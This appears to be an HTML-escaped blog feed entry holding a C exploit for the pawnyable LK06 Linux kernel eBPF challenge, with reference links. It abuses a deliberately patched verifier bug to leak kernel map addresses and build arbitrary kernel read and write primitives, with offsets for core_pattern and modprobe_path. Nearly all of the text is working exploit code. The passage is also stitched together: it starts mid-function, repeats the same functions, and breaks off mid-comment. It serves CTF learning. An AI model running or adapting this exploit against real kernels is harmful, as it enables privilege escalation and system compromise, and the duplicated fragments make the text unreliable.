      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t jit_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] jit_addr: 0x%016lx\n&amp;#34;, jit_addr);

  get_enter_to_continue(&amp;#34;Press enter to exit(cause kernel crash)...&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h2 id=&#34;refernece&#34;&gt;Refernece&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description>
      <content>&lt;hr&gt;
&lt;h2 id=&#34;lk06-brahman&#34;&gt;LK06: Brahman&lt;/h2&gt;
&lt;h3 id=&#34;exploit-using-adjust_ptr_min_max_vals&#34;&gt;Exploit using adjust_ptr_min_max_vals&lt;/h3&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;149628537&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;149628537&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;exploit.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
